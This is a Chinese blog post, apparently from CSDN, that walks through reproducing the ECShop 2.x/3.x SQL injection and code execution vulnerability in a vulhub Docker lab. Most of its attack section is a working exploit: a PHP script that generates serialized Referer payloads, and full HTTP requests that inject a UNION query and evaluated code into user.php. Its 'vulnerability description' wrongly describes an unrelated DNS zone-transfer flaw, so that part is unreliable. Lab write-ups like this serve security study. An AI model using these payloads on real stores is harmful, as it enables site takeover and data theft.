ECShop 2.x3.x SQL注入任意代码执行漏洞

最新推荐文章于 2024-07-18 16:43:09 发布
最新推荐文章于 2024-07-18 16:43:09 发布
阅读量453 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111414354
版权

声明

好好学习,天天向上

漏洞描述

DNS协议支持使用axfr类型的记录进行区域传送,用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞。

影响范围

ECShop 2.x

ECShop 3.x

复现过程

这里使用2.7.3与3.6.0版本

使用vulhub

/app/vulhub-master/ecshop/xianzhi-2017-02-82239600

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080
http://192.168.239.129:8081

2.7.3的安装页面

3.6.0的安装页面

依次安装二者,mysql地址填写mysql,mysql账户与密码均为root,数据库名随意填写,但2.7.3与3.6.0的数据库名不能相同。

POC如下,将其放在phpstudy或者其他web站点下,访问即可得到2.x和3.x的POC,POC主要用于替换referer字段的

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

在这里插入图片描述

抓包

GET /user.php?act=login HTTP/1.1
Host: 192.168.239.129:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CFID=1; CFTOKEN=425afb9d255c4aab-544A55E0-EE35-CB65-8EB9BD40F9E2FCF8; CFAUTHORIZATION_cfadmin="YWRtaW4NY2ZhZG1pbg0xNjA4MTc3MTcxMzkyDUZENkZEMzFCRDExN0E0OTM="; CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=ED6075ACE275F56BB40F6B97FE442899.cfusion; PHPSESSID=12bae515807040abbd823444e1a94f07; ECS_ID=f0c69522e02d5a607faa9f66031eef80e2fc3fc6; ECS[visit_times]=2
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

在这里插入图片描述

GET /user.php?act=login HTTP/1.1
Host: 192.168.239.129:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CFID=1; CFTOKEN=425afb9d255c4aab-544A55E0-EE35-CB65-8EB9BD40F9E2FCF8; CFAUTHORIZATION_cfadmin="YWRtaW4NY2ZhZG1pbg0xNjA4MTc3MTcxMzkyDUZENkZEMzFCRDExN0E0OTM="; CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; JSESSIONID=ED6075ACE275F56BB40F6B97FE442899.cfusion; PHPSESSID=12bae515807040abbd823444e1a94f07; ECS_ID=f0c69522e02d5a607faa9f66031eef80e2fc3fc6; ECS[visit_times]=2
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入
qq_51577576的博客
10-01 1755
[ vulhub漏洞复现篇 ] ECShop 4.x collection_list SQL注入ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
[ vulhub漏洞复现篇 ] ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600
qq_51577576的博客
09-25 1247
[ vulhub漏洞复现篇 ] ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0已修复此漏洞,vulhub使用其最新版本2.7.3和3.6.0非最新版本来重现该漏洞
Ecshop2.7.3[已打2.7.3漏洞补丁].ra
04-02
从官方下载源码包,也已经修复了最新的漏洞
20 - vulhub - ECShop 2.x/3.x SQL注入/任意代码执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-15 1175
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3版本与3.6.0次新版本进行漏洞复现。 其实该漏洞复现的意义不是很大,现在都 7.x 8.x 版本了,但是不失为 `了解程序员写bug` 的一种另类方式。
ecshop 2.x/3.x SQL注入/代码执行
最新发布
qq_23003811的博客
07-18 272
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞注入恶意数据,最终导致任意代码执行漏洞,其3.6.0最新版已修复该漏洞。3、在Referer处修改payload。1、漏洞发生是在会员登录页面。2、生成payload的脚本。
Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
Baidu_Secrity的博客
09-07 684
近日,Ecshop爆出全版本SQL注入任意代码执行漏洞,受影响的版本有:Ecshop 2.xEcshop 3.x-3.6.0该漏洞产生的根本原因在于Ecshop系统的user.php文...
ecshop 2.x/3.x sql注入/任意代码执行漏洞
whatday的专栏
07-01 2115
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代码执行。 值得一提的是攻击者利用的payload只适用于ECShop 2.x版本导致有部分安全分析者认为该漏洞不影响ECShop 3.x,这个是因为在3.x的版本里有引入防注...
ECShop 2.x/3.x SQL注入/任意代码执行漏洞复现
weixin_51387754的博客
11-15 362
漏洞原理 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞注入恶意数据,最终导致任意代码执行漏洞。 影响版本 ECShop 2.x ECShop 3.x 漏洞复现 (root????guiltyfet)-[/home/guiltyfet/vulhub/ecshop/xianzhi-2017-02-82239600] └─# docker-compos
ecshop全系列SQL注入漏洞分析
d59hao的博客
05-04 298
referer值未加判断直接引用,可被攻击者控制输入利用_echash = “554fcae493e564ee0dc75bdf2ebf94ca” 为定值进行切分,构造payload利用反序列化漏洞,构造payload,传输恶意代码insert_ads函数的SQL拼接不规范导致存在SQL注入make_val函数拼接字符串输入,_eval中调用用户输入通过eval最终导致任意命令执行
BaizeSec#bylibrary#ecshop2.x_命令执行1
07-25
代码执行在网站根目录下生成1.php的一句话。
ECShop_V2.6.2_UTF8_Release0326.zip
02-04
然而,这个版本存在一些重要的安全问题,特别是关于"ecshop2.2 ecshop2.x代码执行漏洞"的标签所提及的,这是一个对系统安全性构成威胁的重要知识点。 1. **代码执行漏洞**:在ECShop V2.6.2中,存在代码执行漏洞,...
110套ecshop模板.zip
06-05
"110套ecshop模板.zip"这个压缩包文件显然包含了110个不同的ECShop店铺模板,这些模板设计用于帮助用户自定义他们的在线商店,以提供独特的用户体验并吸引潜在顾客。 ECShop模板主要包含以下组件和元素: 1. **...
20.Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
weixin_30588827的博客
11-13 348
Ecshop 2.x/3.x SQL注入/任意代码执行漏洞 影响版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注入到危险函数eval中,从而实现了任意代...
ECShop 2.x/3.x SQL注入/任意代码执行 漏洞复现
qq_44504968的博客
09-22 1369
ECShop 2.x/3.x SQL注入/任意代码执行 文章目录ECShop 2.x/3.x SQL注入/任意代码执行漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。
ECShop 2.x/3.x SQL注入/远程代码执行漏洞
SwBack的博客
04-09 1459
ecshop 漏洞主要是因为 user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.不需要登录即可远程写入webshell。
ECSHOP v2.7.3注入漏洞分析和修复
weixin_34334744的博客
04-13 1229
测试版本 漏洞条件 漏洞利用 产生原因 修复方案 1.测试版本 v2.7.3 RELEASE 20121106(最新) v2.7.3 RELEASE 20120411 2.漏洞条件 需登录到后台 3.漏洞利用 1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息” 为什么要搜索“用户信息”,还可以搜索其它的吗? 答案是搜索languages\zh_cn\u...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值